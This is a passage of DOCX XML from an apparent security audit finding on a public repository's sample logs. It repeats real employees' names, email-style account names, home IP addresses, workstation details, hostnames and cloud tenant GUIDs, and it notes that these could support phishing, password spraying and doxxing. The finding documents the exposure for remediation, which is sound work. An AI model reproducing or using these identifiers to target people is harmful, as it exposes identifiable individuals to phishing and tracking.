      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…_set_domain_authentication.yml:77</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…_add_unverified_domain.yml:78</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2601:646:a000:200:c4db:f288:7e28:21b3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…_invite_external_user.yml:76</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); IPv4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>95.90.199.65</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Vodafone DE, 7 CloudTrail files), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67.171.71.185</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>73.15.72.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>142.254.89.27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.93.193.6/7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.93.242.200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.184.242.57</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>61.25.42.212</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.25.72.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line refs in T1), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>174.235.80.142</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pingid.yml:45</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developer workstation capture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/osquery_results.yml:74</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"hostIdentifier":"HackBook.local"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HOME=/Users/patrick</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TMPDIR=/var/folders/tc/m9brp20d1mvfgssff70501m40000gn/T/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.OOwoeuT9LF/Listeners</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ITERM_SESSION_ID=…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LANG=de_DE.UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack-range hostnames carrying employee handles: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win-dc-mhaag-attack-range-84.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win-dc-mvelazco-02713-392.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win-dc-tcontreras-attack-range-478.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win-dc-ctus-attack-range-403.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (detections/data_sources, 20+ lines).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> These are not secrets but are personal data (names, UPNs, object IDs, home-network IP addresses, home-directory names, locale) of identifiable Splunk employees, published in perpetuity in a widely-forked public repository. They enable targeted phishing/pretexting (the UPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rodsoto@rodsoto.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plus tenant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0e8108b1-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suffices to attempt password-spray/consent-phishing against a real Entra tenant), doxxing (residential IP geolocation), and are a data-minimisation issue under GDPR/CCPA. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pbareiss@splunk.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a lab identity (fine); the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ones are real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disclosure only. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable (privacy / reconnaissance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rn 'Rod  Soto' data_sources/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/m365_copilot_graph_api.yml:68</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rnoE '2601:646:a000:200:[0-9a-f:]+' data_sources | wc -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rewrite to documentation values: UPNs → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user@contoso.onmicrosoft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, display names → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Test User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, GUIDs → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>00000000-0000-0000-0000-00000000000N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, IPv4 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.0.2.x</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>198.51.100.x</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>203.0.113.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, IPv6 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2001:db8::/32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, hostnames → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>win-dc-01.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, home dirs → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/Users/analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Enforce with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lint in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml-validation.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (deny-list regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@splunk\.com|@[a-z]+\.onmicrosoft\.com|^2601:|/Users/[a-z]+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Add a CONTRIBUTING.md rule: "sample logs must come from the attack range with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scrub_cloudtrail_samples.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applied".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-359 (Exposure of Private Personal Information), CWE-200, CWE-540; OWASP Top 10 2021 A02, A05; ASVS 8.3.4, 8.3.5; ATT&amp;CK T1589.002 (Gather Victim Identity Information: Email Addresses), T1591, T1078.004; NIST SP 800-53r5 PT-2, PM-25, SC-28, SA-11; NIST CSF 2.0 PR.DS-01, GV.PO-01; ISO/IEC 27001:2022 A.5.34 (Privacy &amp; PII), A.8.24, A.8.12; SANS Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-359 Exposure of Private Personal Information to an Unauthorized Actor; CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17); CWE-540 Inclusion of Sensitive Information in Source Code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures, A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1589, T1078.004 Valid Accounts: Cloud Accounts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PT-2, SC-28 Protection of Information at Rest, SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.34, A.8.24 Use of cryptography, A.8.12 Data leakage prevention. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-10 — Internal infrastructure and cloud-tenant identifiers disclosed (hostnames, private URLs, tenant GUIDs, S3 buckets, playground endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Not exploitable (disclosure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data_sources/azure_active_directory_*.yml:76-78; playbooks/block_indicators.json:1503-3047; playbooks/malware_hunt_and_contain.json:4834-5558; .github/workflows/response_templates/template_script.py:144; contentctl.yml:37-262</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low – CVSS v3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location (representative, all `grep -n` verified):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entra tenant GUIDs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fc69e276-e9e8-4af9-9002-1e410d77244e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_sources/azure_active_directory_*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files, lines 76-78), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>887c9144-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…sign_in_activity.yml:127</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>95d19bda-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…noninteractiveusersigninlogs.yml:137</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>225e05a1-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>…microsoftgraphactivitylogs.yml:17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75243ab2-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3 files), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a417c578-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>91da745f-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5f210575-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26db52ee-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>azure_monitor_activity.yml:104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ad251139-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + subscriptions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1aee0e3d-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>67165197-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>e0c00901-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
